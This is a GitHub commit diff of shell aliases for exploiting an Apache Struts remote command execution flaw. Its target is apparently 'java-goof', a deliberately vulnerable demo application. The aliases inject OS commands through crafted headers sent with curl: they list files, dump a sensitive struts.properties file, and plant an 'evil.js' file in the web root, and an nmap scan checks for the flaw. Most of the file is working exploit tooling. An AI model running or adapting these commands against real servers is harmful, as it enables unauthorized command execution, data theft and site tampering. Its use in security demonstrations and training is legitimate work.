You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
alias struts_base_command="echo \$EXP_MESSAGE'\n\n' &| cat struts-exploit-headers.txt| sed 's/COMMAND/'\$EXP_COMMAND'/' | xargs curl --http1.0 \$JAVA_GOOF_DEBUG $JAVA_GOOF_HOST -H"
7
+
alias struts_base_command="echo \$EXP_MESSAGE'\n\n' &| cat struts-exploit-headers.txt| sed 's/COMMAND/'\$EXP_COMMAND'/' | xargs curl --http1.0 \$JAVA_GOOF_DEBUG $JAVA_GOOF_URL -H"
7
8
9
+
# Check if struts is there
10
+
alias struts0="nmap -p 80 --script http-vuln-struts-detection.nse $JAVA_GOOF_HOST"
8
11
9
12
# List files (simple)
10
13
alias struts1="export EXP_MESSAGE='Getting list of files...'; export EXP_COMMAND='ls -l'; struts_base_command"
@@ -21,5 +24,12 @@ alias struts4="export EXP_MESSAGE='Getting full list of files...'; export EXP_CO
21
24
# Show a sensitive file
22
25
alias struts5="export EXP_MESSAGE='Showing sensitive properties file...'; export EXP_COMMAND='cat .\/target\/tomcat.*\/webapps\/expanded\/WEB-INF\/classes\/struts.properties'; struts_base_command"
23
26
24
-
# Create a file
25
-
alias struts6="export EXP_MESSAGE='Create a file at $JAVA_GOOF_HOST/static/js/evil.js...'; export export EXP_COMMAND='echo MUHAHAHAHAHAHAHA > .\/target\/tomcat.'\$JAVA_GOOF_TOMCAT_PID'\/webapps\/expanded\/static\/js\/evil.js'; struts_base_command"
27
+
# Create a file *********(make sure JAVA_GOOF_TOMCAT_PID is set to the right PID)******
28
+
alias struts6="export EXP_MESSAGE='Create a file at $JAVA_GOOF_URL/static/js/evil.js...'; export export EXP_COMMAND='echo MUHAHAHAHAHAHAHA > .\/target\/tomcat.'\$JAVA_GOOF_TOMCAT_PID'\/webapps\/expanded\/static\/js\/evil.js'; struts_base_command"
0 commit comments